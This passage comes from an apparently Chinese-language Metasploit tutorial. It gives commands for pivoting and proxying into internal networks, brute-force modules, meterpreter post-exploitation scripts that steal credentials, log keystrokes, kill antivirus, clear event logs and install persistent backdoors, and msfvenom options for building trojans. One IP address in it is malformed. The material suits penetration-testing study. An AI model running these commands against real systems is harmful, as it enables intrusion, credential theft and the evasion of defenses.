secist.txt&nbsp;\uff08\u5c06\u6a21\u677f\u6587\u4ef6MACE\u65f6\u95f4\uff0c\u590d\u5236\u7ed9\u5f53\u524d\u6587\u4ef6\uff09<\/p>\n\n\n\n<p>timestomp -v secist.txt<\/p>\n\n\n\n<p>26.\u5185\u7f51\u4ee3\u7406<\/p>\n\n\n\n<p>meterpreter &gt; run autoroute -s 192.168.1.0\/24<\/p>\n\n\n\n<p>msf exploit(handler) &gt; use auxiliary\/scanner\/portscan\/tcp<\/p>\n\n\n\n<p>msf auxiliary(tcp) &gt; set PORTS 80,8080,21,22,3389,445,1433,3306<\/p>\n\n\n\n<p>msf auxiliary(tcp) &gt; set RHOSTS 192.168.3.1\/24<\/p>\n\n\n\n<p>msf auxiliary(tcp) &gt; set THERADS 10<\/p>\n\n\n\n<p>msf auxiliary(tcp) &gt; exploit<\/p>\n\n\n\n<p>meterpreter &gt; background<\/p>\n\n\n\n<p>msf exploit(handler) &gt; use auxiliary\/server\/socks4a<\/p>\n\n\n\n<p>msf auxiliary(socks4a) &gt; route print<\/p>\n\n\n\n<p>msf auxiliary(socks4a) &gt; ifconfig<\/p>\n\n\n\n<p>msf auxiliary(socks4a) &gt; set SRVHOST xxx.xxx.xx.xx #xxx.xxx.xx.xx\u4e3a\u81ea\u5df1\u8fd0\u884cmsf\u7684vps\u673a\u5b50&#8217;<\/p>\n\n\n\n<p>msf auxiliary(socks4a) &gt; exploit<\/p>\n\n\n\n<p>27.SSH\u4ee3\u7406<\/p>\n\n\n\n<p>msf &gt; load meta_ssh<\/p>\n\n\n\n<p>msf &gt; use multi\/ssh\/login_password<\/p>\n\n\n\n<p>msf &gt; set RHOST 192.168.56.3<\/p>\n\n\n\n<p>RHOST =&gt; 192.168.56.3<\/p>\n\n\n\n<p>msf &gt; set USER test<\/p>\n\n\n\n<p>USER =&gt; test<\/p>\n\n\n\n<p>msf &gt; set PASS reverse<\/p>\n\n\n\n<p>PASS =&gt; reverse<\/p>\n\n\n\n<p>msf &gt; set PAYLOAD ssh\/metassh_session<\/p>\n\n\n\n<p>PAYLOAD =&gt; ssh\/metassh_session<\/p>\n\n\n\n<p>msf &gt; exploit -z<\/p>\n\n\n\n<p>[*] Connecting to dsl@192.168.56.3:22 with password reverse<\/p>\n\n\n\n<p>[*] metaSSH session 1 opened (127.0.0.1 -&gt; 192.168.56.3:22) at 2011-12-28&nbsp;&nbsp; 03:51:16 +1300<\/p>\n\n\n\n<p>[*] Session 1 created in the background.<\/p>\n\n\n\n<p>msf &gt; route add 192.168.57.0 255.255.255.0 1<\/p>\n\n\n\n<p>\u4e4b\u540e\u5c31\u662f\u6109\u5feb\u7684\u5185\u7f51\u626b\u63cf\u4e86<\/p>\n\n\n\n<p>\u5f53\u7136\u8fd8\u662f\u63a8\u8350\u76f4\u63a5\u7528<\/p>\n\n\n\n<p>ssh -f -N -D 127.0.0.1:6666 test@103.224.81.1.1<\/p>\n\n\n\n<p>28.\u5185\u7f51\u626b\u63cf<\/p>\n\n\n\n<p>meterpreter &gt; run autoroute -s 192.168.3.98<\/p>\n\n\n\n<p>meterpreter &gt; background<\/p>\n\n\n\n<p>[*] Backgrounding session 2&#8230;<\/p>\n\n\n\n<p>msf exploit(handler) &gt; use auxiliary\/scanner\/portscan\/tcp<\/p>\n\n\n\n<p>msf auxiliary(tcp) &gt; set PORTS 80,8080,21,22,3389,445,1433,3306<\/p>\n\n\n\n<p>PORTS =&gt; 80,8080,21,22,3389,445,1433,3306<\/p>\n\n\n\n<p>msf auxiliary(tcp) &gt; set RHOSTS 192.168.3.1\/24<\/p>\n\n\n\n<p>RHOSTS =&gt; 192.168.3.1\/24<\/p>\n\n\n\n<p>msf auxiliary(tcp) &gt; set THERADS 10<\/p>\n\n\n\n<p>THERADS =&gt; 10<\/p>\n\n\n\n<p>msf auxiliary(tcp) &gt; exploit<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025548498-847879145.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u6211\u8fd8\u662f\u63a8\u8350\u5f00\u4ee3\u7406\u7528Nmap\u626b\u63cf&gt;.&lt;<\/p>\n\n\n\n<p>29.\u4e00\u4e9b\u5e38\u7528\u7684\u7834\u89e3\u6a21\u5757<\/p>\n\n\n\n<p>auxiliary\/scanner\/mssql\/mssql_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/ftp\/ftp_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/ssh\/ssh_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/telnet\/telnet_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/smb\/smb_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/mssql\/mssql_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/mysql\/mysql_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/oracle\/oracle_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/postgres\/postgres_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/vnc\/vnc_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/pcanywhere\/pcanywhere_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/snmp\/snmp_login<\/p>\n\n\n\n<p>auxiliary\/scanner\/ftp\/anonymous<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025550517-433707359.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>30.\u4e00\u4e9b\u597d\u7528\u7684\u6a21\u5757<\/p>\n\n\n\n<p>auxiliary\/admin\/realvnc_41_bypass&nbsp; (Bypass VNCV4\u7f51\u4e0a\u4e5f\u6709\u5229\u7528\u5de5\u5177)<\/p>\n\n\n\n<p>auxiliary\/admin\/cisco\/cisco_secure_acs_bypass \uff08cisco Bypass \u7248\u672c5.1\u6216\u8005\u672a\u6253\u8865\u4e015.2\u7248\u6d1e\u7565\u8001\uff09<\/p>\n\n\n\n<p>auxiliary\/admin\/http\/jboss_deploymentfilerepository \uff08\u5185\u7f51\u9047\u5230Jboss\u6700\u7231:)\uff09<\/p>\n\n\n\n<p>auxiliary\/admin\/http\/dlink_dir_300_600_exec_noauth (Dlink \u547d\u4ee4\u6267\u884c:)<\/p>\n\n\n\n<p>auxiliary\/admin\/mssql\/mssql_exec \uff08\u7528\u7206\u7834\u5f97\u5230\u7684sa\u5f31\u53e3\u4ee4\u8fdb\u884c\u6267\u884c\u547d\u4ee4\u6ca1\u56de\u663e:(\uff09<\/p>\n\n\n\n<p>auxiliary\/scanner\/http\/jboss_vulnscan (Jboss \u5185\u7f51\u6e17\u900f\u7684\u597d\u670b\u53cb)<\/p>\n\n\n\n<p>auxiliary\/admin\/mysql\/mysql_sql (\u7528\u7206\u7834\u5f97\u5230\u7684\u5f31\u53e3\u4ee4\u6267\u884csql\u8bed\u53e5:)<\/p>\n\n\n\n<p>auxiliary\/admin\/oracle\/post_exploitation\/win32exec \uff08\u7206\u7834\u5f97\u5230Oracle\u5f31\u53e3\u4ee4\u6765Win32\u547d\u4ee4\u6267\u884c\uff09<\/p>\n\n\n\n<p>auxiliary\/admin\/postgres\/postgres_sql (\u7206\u7834\u5f97\u5230\u7684postgres\u7528\u6237\u6765\u6267\u884csql\u8bed\u53e5)<\/p>\n\n\n\n<p>auxiliary\/scanner\/rsync\/modules_list&nbsp; \uff08Rsync\uff09<\/p>\n\n\n\n<p>auxiliary\/scanner\/misc\/redis_server&nbsp; (Redis)<\/p>\n\n\n\n<p>auxiliary\/scanner\/ssl\/openssl_heartbleed (\u5fc3\u810f\u6ef4\u8840)<\/p>\n\n\n\n<p>auxiliary\/scanner\/mongodb\/mongodb_login (Mongodb)<\/p>\n\n\n\n<p>auxiliary\/scanner\/elasticsearch\/indices_enum (elasticsearch)<\/p>\n\n\n\n<p>auxiliary\/scanner\/http\/axis_local_file_include (axis\u672c\u5730\u6587\u4ef6\u5305\u542b)<\/p>\n\n\n\n<p>auxiliary\/scanner\/http\/http_put (http Put)<\/p>\n\n\n\n<p>auxiliary\/scanner\/http\/gitlab_user_enum (\u83b7\u53d6\u5185\u7f51gitlab\u7528\u6237)<\/p>\n\n\n\n<p>auxiliary\/scanner\/http\/jenkins_enum (\u83b7\u53d6\u5185\u7f51jenkins\u7528\u6237)<\/p>\n\n\n\n<p>auxiliary\/scanner\/http\/svn_scanner \uff08svn Hunter :)\uff09<\/p>\n\n\n\n<p>auxiliary\/scanner\/http\/tomcat_mgr_login (Tomcat \u7206\u7834)<\/p>\n\n\n\n<p>auxiliary\/scanner\/http\/zabbix_login \uff08Zabbix :)\uff09<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">0x05 \u5e38\u89c1\u811a\u672c<\/h2>\n\n\n\n<p>\u5728\u83b7\u5f97meterpreter\u7684session\u540e\uff0c\u9664\u4e86meterpreter\u672c\u8eab\u5185\u7f6e\u7684\u4e00\u4e9b\u57fa\u672c\u529f\u80fd\uff0c\u5728\/usr\/share\/metasploit-framework\/scripts\/meterpreter\u4e0b\u9762\u8fd8\u6709\u5f88\u591ascripts\uff0c\u63d0\u4f9b\u4e86\u5f88\u591a\u989d\u5916\u529f\u80fd\uff0c\u975e\u5e38\u597d\u7528<\/p>\n\n\n\n<p>\u6211\u770b\u7f51\u4e0a\u6ca1\u6709\u8be6\u7ec6\u4ecb\u7ecd\u5e38\u89c1\u811a\u672c\u529f\u80fd\u7684\u6587\u7ae0,\u5c31\u603b\u7ed3\u4e86\u4e00\u4e0b<\/p>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7run&nbsp;\u811a\u672c\u540d\u6765\u8fdb\u884c\u4f7f\u7528<\/p>\n\n\n\n<p>run \u811a\u672c\u540d -h\u53ef\u4ee5\u67e5\u770b\u5e2e\u52a9<\/p>\n\n\n\n<p>1.arp_scanner<\/p>\n\n\n\n<p>\u5229\u7528arp\u8fdb\u884c\u5b58\u6d3b\u4e3b\u673a\u626b\u63cf<\/p>\n\n\n\n<p>run&nbsp; arp_scanner-r&nbsp; 192.168.1.0\/24<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025550938-1883039561.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>2.autoroute<\/p>\n\n\n\n<p>\u53ef\u4ee5\u6dfb\u52a0\uff0c\u5220\u9664\uff0c\u663e\u793a\u8def\u7531\u8868<\/p>\n\n\n\n<p>3.checkvm<\/p>\n\n\n\n<p>\u53ef\u4ee5\u68c0\u6d4b\u76ee\u6807\u662f\u5426\u662f\u865a\u62df\u673a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025551376-750595215.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>4.credcollect<\/p>\n\n\n\n<p>\u6536\u96c6\u76ee\u6807\u4e3b\u673a\u4e0a\u7684hash\u7b49\u51ed\u8bc1<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025551675-1474014799.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>5.domain_list_gen<\/p>\n\n\n\n<p>\u83b7\u53d6\u57df\u7ba1\u7406\u8d26\u6237\u5217\u8868\uff0c\u5e76\u5224\u65ad\u5f53\u524dsession\u6240\u5728\u7528\u6237\u662f\u5426\u5728\u5217\u8868\u4e2d<\/p>\n\n\n\n<p>6.dumplinks<\/p>\n\n\n\n<p>Link\u6587\u4ef6\u5305\u542b\u65f6\u95f4\u6233\uff0c\u6587\u4ef6\u4f4d\u7f6e\uff0c\u5171\u4eab\u540d\uff0c\u5377\u5e8f\u5217\u53f7\uff0c\u7b49\u3002\u811a\u672c\u4f1a\u5728\u7528\u6237\u76ee\u5f55\u548coffice\u76ee\u5f55\u4e2d\u6536\u96c6lnk\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025552212-1107389080.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u8c03\u7528post\/windows\/gather\/dumplinks\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u4e0a\u6700\u8fd1\u8bbf\u95ee\u8fc7\u7684\u6587\u6863\u3001\u94fe\u63a5\u4fe1\u606f<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1arun&nbsp; post\/windows\/gather\/dumplinks<\/p>\n\n\n\n<p>\u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025553097-939182348.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>7.duplicate<\/p>\n\n\n\n<p>\u518d\u6b21\u4ea7\u751fpayload\uff0c\u6ce8\u5165\u5230\u5176\u4ed6\u8fdb\u7a0b\u6216\u6253\u5f00\u65b0\u8fdb\u7a0b\u5e76\u6ce8\u5165\u5176\u4e2d<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025553472-1759287361.gif\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025554041-895555347.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>8.enum_chrome<\/p>\n\n\n\n<p>\u83b7\u53d6chrome\u4e2d\u7684\u4fe1\u606f<\/p>\n\n\n\n<p>9.enum_firefox<\/p>\n\n\n\n<p>\u83b7\u53d6firefox\u4e2d\u7684\u4fe1\u606f\uff0c\u5305\u62eccooikie\uff0c\u5386\u53f2\u7eaa\u5f55\uff0c\u4e66\u7b7e\u7b49<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025554288-824143740.gif\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025554575-1007158086.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>10.enum_logged_on_users<\/p>\n\n\n\n<p>\u5217\u51fa\u5f53\u524d\u767b\u5f55\u7684\u7528\u6237<\/p>\n\n\n\n<p>11.enum_powershell_env<\/p>\n\n\n\n<p>\u5217\u51fapowershell\u548cWSH\u7684\u914d\u7f6e\u6587\u4ef6<\/p>\n\n\n\n<p>12.enum_putty<\/p>\n\n\n\n<p>\u5217\u51faputty\u7684\u914d\u7f6e\u6587\u4ef6<\/p>\n\n\n\n<p>13.enum_shares<\/p>\n\n\n\n<p>\u5217\u51fa\u5171\u4eab\u53ca\u5386\u53f2\u5171\u4eab<\/p>\n\n\n\n<p>14.enum_vmware<\/p>\n\n\n\n<p>\u5217\u51favmware\u7684\u914d\u7f6e\u6587\u4ef6\u548c\u4ea7\u54c1<\/p>\n\n\n\n<p>15.event_manager<\/p>\n\n\n\n<p>\u53ef\u4ee5\u67e5\u8be2\u548c\u6e05\u7406\u4e8b\u4ef6\u65e5\u5fd7<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025554820-761546121.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>16.file_collector<\/p>\n\n\n\n<p>\u641c\u7d22\u7b26\u5408\u6307\u5b9a\u6a21\u5f0f\u7684\u6587\u4ef6<\/p>\n\n\n\n<p>17.get_application_list<\/p>\n\n\n\n<p>\u83b7\u53d6\u5b89\u88c5\u7684\u7a0b\u5e8f\u5217\u8868\u53ca\u7248\u672c<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025555061-124679317.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>18.getcountermeasure<\/p>\n\n\n\n<p>\u5217\u51faHIPS&nbsp;\u548c AV \u7684\u8fdb\u7a0b\uff0c\u663e\u793aXP \u9632\u706b\u5899\u89c4\u5219,&nbsp;\u5e76\u4e14\u663e\u793a DEP\u548cUAC \u7b56\u7565<\/p>\n\n\n\n<p>Ps\uff1a-k\u53c2\u6570\u53ef\u4ee5\u6740\u6389\u9632\u62a4\u8f6f\u4ef6\u8fdb\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025555455-2002923670.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>19.get_env<\/p>\n\n\n\n<p>\u83b7\u53d6\u6240\u6709\u7528\u6237\u7684\u73af\u5883\u53d8\u91cf<\/p>\n\n\n\n<p>20.get_filezilla_creds<\/p>\n\n\n\n<p>\u83b7\u53d6filezilla\u7684\u767b\u9646\u51ed\u8bc1<\/p>\n\n\n\n<p>21.getgui<\/p>\n\n\n\n<p>\u53ef\u4ee5\u5f88\u65b9\u4fbf\u7684\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\u670d\u52a1\uff0c\u6dfb\u52a0\u7528\u6237\uff0c\u7aef\u53e3\u8f6c\u53d1\u529f\u80fd<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025555936-286147803.gif\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025556295-2013057719.gif\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025556628-1091848798.gif\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025557069-1525335400.gif\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025557538-1359724836.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>22.get_local_subnets<\/p>\n\n\n\n<p>\u83b7\u5f97\u672c\u5730\u7684\u5b50\u7f51<\/p>\n\n\n\n<p>23.get_pidgin_creds<\/p>\n\n\n\n<p>\u83b7\u53d6pidgin\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801<\/p>\n\n\n\n<p>24.gettelnet<\/p>\n\n\n\n<p>\u540c\u4e4b\u524d\u5f00\u542f\u7ec8\u7aef\u684c\u9762\u670d\u52a1\u7684\u811a\u672c\uff0c\u8fd9\u4e2a\u662f\u7528\u6765\u5f00\u542ftelnet\u7684<\/p>\n\n\n\n<p>25.get_valid_community<\/p>\n\n\n\n<p>\u83b7\u53d6SNMP community\u5b57\u7b26\u4e32<\/p>\n\n\n\n<p>26.getvncpw<\/p>\n\n\n\n<p>\u83b7\u53d6vnc\u5bc6\u7801<\/p>\n\n\n\n<p>27.hashdump<\/p>\n\n\n\n<p>\u540cmeterpreter\u7684\u5185\u7f6e\u529f\u80fd<\/p>\n\n\n\n<p>28.hostsedit<\/p>\n\n\n\n<p>\u64cd\u4f5chosts\u6587\u4ef6<\/p>\n\n\n\n<p>29.keylogrecorder<\/p>\n\n\n\n<p>Meterpreter\u5185\u7f6e\u6b64\u529f\u80fd<\/p>\n\n\n\n<p>30.killav<\/p>\n\n\n\n<p>\u5173\u95ed\u9632\u62a4\u8f6f\u4ef6<\/p>\n\n\n\n<p>31.metsvc<\/p>\n\n\n\n<p>\u5c06payload\u5b89\u88c5\u4e3a\u670d\u52a1<\/p>\n\n\n\n<p>32. migrate<\/p>\n\n\n\n<p>\u5c06meterpreter\u4f1a\u8bdd\u79fb\u690d\u5230\u53e6\u4e00\u4e2a\u8fdb\u7a0b<\/p>\n\n\n\n<p>\u4f8b\u5982\u53cd\u5f39\u7684meterpreter\u4f1a\u8bdd\u662f\u5bf9\u65b9\u6253\u5f00\u4e86\u4e00\u4e2a\u4f60\u9884\u7f6e\u7279\u6b8a\u4ee3\u7801\u7684word\u6587\u6863\u800c\u4ea7\u751f\u7684\uff0c\u90a3\u4e48\u5bf9\u65b9\u4e00\u65e6\u5173\u95ed\u6389\u8be5word\u6587\u6863\uff0c\u6211\u4eec\u83b7\u53d6\u5230\u7684meterpreter\u4f1a\u8bdd\u5c31\u4f1a\u968f\u4e4b\u5173\u95ed\uff0c\u6240\u4ee5\u628a\u4f1a\u8bdd\u8fdb\u7a0b\u6ce8\u5165\u5230explorer.exe\u662f\u4e00\u4e2a\u597d\u65b9\u6cd5<\/p>\n\n\n\n<p>\u53ef\u4ee5\u5148\u7528ps\u547d\u4ee4\u770b\u4e00\u4e0b\u76ee\u6807\u4e3b\u673a\u7684explorer.exe\u8fdb\u7a0b\u7684pid<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025558611-883758876.gif\" alt=\"\" width=\"645\" height=\"340\"><br>\u662f1668\u7136\u540e\u6211\u4eec\u7528migrate 1668 \u628ameterpreter\u4f1a\u8bdd\u6ce8\u5165\u8fdb\u53bb<\/p>\n\n\n\n<p>33 .persistence<\/p>\n\n\n\n<p>\u53ef\u89c1\u5efa\u7acb\u4e00\u4e2a\u6301\u4e45\u6027\u7684\u540e\u95e8\uff0c\u8bbe\u7f6e\u6210\u5f00\u673a\u542f\u52a8<\/p>\n\n\n\n<p>34. service_permissions_escalate<\/p>\n\n\n\n<p>\u8bb8\u591a\u670d\u52a1\u88ab\u914d\u7f6e\u4e86\u4e0d\u5b89\u5168 \u7684\u6743\u9650\u3002 \u8fd9\u4e2a\u811a\u672c\u4f1a\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u670d\u52a1, \u7136\u540e\u4f1a\u641c\u7d22\u5df2\u5b58\u5728d\u670d\u52a1\uff0c\u627e\u5230\u4e0d\u5b89\u5168\u7684\u6587\u4ef6\u6216\u914d\u7f6e\u6709\u95ee\u9898\u7684\u6587\u4ef6\uff0c\u7528\u4e00\u4e2apayload\u66ff\u6362\u6389\u4ed6\uff0c\u7136\u540e\u4f1a\u5c1d\u8bd5\u91cd\u542f\u670d\u52a1\u6765\u8fd0\u884c\u8fd9\u4e2apaylaod\uff0c\u5982\u679c\u91cd\u542f\u670d\u52a1\u5931\u8d25\uff0c\u5219\u5728\u4e0b\u6b21\u670d\u52a1\u5668\u91cd\u542f\u65f6\u4f1a\u6267\u884cpayload<\/p>\n\n\n\n<p>35.vnc<\/p>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n<p>36. win32-sshserver<\/p>\n\n\n\n<p>\u5b89\u88c5openssh\u670d\u52a1<\/p>\n\n\n\n<p>37. winenum<\/p>\n\n\n\n<p>\u4f1a\u81ea\u52a8\u8fd0\u884c\u591a\u79cd\u547d\u4ee4\uff0c\u5c06\u547d\u4ee4\u7ed3\u679c\u4fdd\u5b58\u5230\u672c\u5730<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025559381-1577792043.gif\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025559874-269538336.gif\" alt=\"\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">0x06 msfvenom\u547d\u4ee4\u53c2\u6570<\/h2>\n\n\n\n<p>metasploit-framework\u65d7\u4e0b\u7684msfpayload\uff08\u8377\u8f7d\u751f\u6210\u5668\uff09\uff0cmsfencoder\uff08\u7f16\u7801\u5668\uff09\uff0cmsfcli\uff08\u76d1\u542c\u63a5\u53e3\uff09\u5df2\u7ecf\u88ab\u6574\u5408\u6210msfvenom\u3002\u53ef\u4ee5\u5229\u7528msfvenom\u751f\u6210\u6728\u9a6c\u7a0b\u5e8f\uff0c\u5e76\u4e14\u76ee\u6807\u673a\u4e0a\u6267\u884c\uff0c\u5728\u672c\u5730\u505a\u76d1\u542c<\/p>\n\n\n\n<p>1.msfvenom\u547d\u4ee4\u884c\u9009\u9879<\/p>\n\n\n\n<p>\u5728kali\u7684\u547d\u4ee4\u884c\u4e2d\u8f93\u5165msfvenom -h\u5c31\u4f1a\u663e\u793a\u5176\u7528\u6cd5\uff1a<\/p>\n\n\n\n<p>Options:<\/p>\n\n\n\n<p>-p, &#8211;payload&lt;payload&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u6307\u5b9a\u9700\u8981\u4f7f\u7528\u7684payload(\u653b\u51fb\u8377\u8f7d)<\/p>\n\n\n\n<p>-l, &#8211;list[module_type]&nbsp;&nbsp; \u5217\u51fa\u6307\u5b9a\u6a21\u5757\u7684\u6240\u6709\u53ef\u7528\u8d44\u6e90,\u6a21\u5757\u7c7b\u578b\u5305\u62ec: payloads, encoders, nops, all<\/p>\n\n\n\n<p>-n, &#8211;nopsled&lt;length&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u4e3apayload\u9884\u5148\u6307\u5b9a\u4e00\u4e2aNOP\u6ed1\u52a8\u957f\u5ea6<\/p>\n\n\n\n<p>-f, &#8211;format&lt;format&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u6307\u5b9a\u8f93\u51fa\u683c\u5f0f (\u4f7f\u7528 &#8211;help-formats \u6765\u83b7\u53d6msf\u652f\u6301\u7684\u8f93\u51fa\u683c\u5f0f\u5217\u8868)<\/p>\n\n\n\n<p>-e, &#8211;encoder[encoder]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u6307\u5b9a\u9700\u8981\u4f7f\u7528\u7684encoder\uff08\u7f16\u7801\u5668\uff09<\/p>\n\n\n\n<p>-a, &#8211;arch&lt;architecture&gt;&nbsp; \u6307\u5b9apayload\u7684\u76ee\u6807\u67b6\u6784<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; &#8211;platform&nbsp;&nbsp; &lt;platform&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u6307\u5b9apayload\u7684\u76ee\u6807\u5e73\u53f0<\/p>\n\n\n\n<p>-s, &#8211;space&lt;length&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u8bbe\u5b9a\u6709\u6548\u653b\u51fb\u8377\u8f7d\u7684\u6700\u5927\u957f\u5ea6<\/p>\n\n\n\n<p>-b, &#8211;bad-chars&lt;list&gt;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u8bbe\u5b9a\u89c4\u907f\u5b57\u7b26\u96c6\uff0c\u6bd4\u5982: &amp;#039;\\x00\\xff&amp;#039;<\/p>\n\n\n\n<p>-i, &#8211;iterations &lt;count&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u6307\u5b9apayload\u7684\u7f16\u7801\u6b21\u6570<\/p>\n\n\n\n<p>-c, &#8211;add-code&lt;path&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u6307\u5b9a\u4e00\u4e2a\u9644\u52a0\u7684win32 shellcode\u6587\u4ef6<\/p>\n\n\n\n<p>-x, &#8211;template&lt;path&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u6307\u5b9a\u4e00\u4e2a\u81ea\u5b9a\u4e49\u7684\u53ef\u6267\u884c\u6587\u4ef6\u4f5c\u4e3a\u6a21\u677f<\/p>\n\n\n\n<p>-k, &#8211;keep&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u4fdd\u62a4\u6a21\u677f\u7a0b\u5e8f\u7684\u52a8\u4f5c\uff0c\u6ce8\u5165\u7684payload\u4f5c\u4e3a\u4e00\u4e2a\u65b0\u7684\u8fdb\u7a0b\u8fd0\u884c<\/p>\n\n\n\n<p>&#8211;payload-options&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u5217\u4e3epayload\u7684\u6807\u51c6\u9009\u9879<\/p>\n\n\n\n<p>-o, &#8211;out&lt;path&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \u4fdd\u5b58payload<\/p>\n\n\n\n<p>-v, &#8211;var-name 